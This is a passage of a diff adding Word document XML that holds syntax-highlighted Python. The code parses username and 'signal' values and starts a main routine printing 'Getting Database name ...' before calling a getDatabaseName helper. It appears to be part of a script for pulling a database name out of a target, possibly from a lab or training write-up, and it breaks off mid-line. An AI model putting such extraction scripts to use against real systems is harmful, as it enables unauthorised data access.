+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>split</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>','</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>list</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>set</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t># Main</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>__name__</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>'__main__'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"Getting Database name ..."</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>database_name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getDatabaseName</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>random</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>choice</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>ascii_letters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>database_name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>not</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>None</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
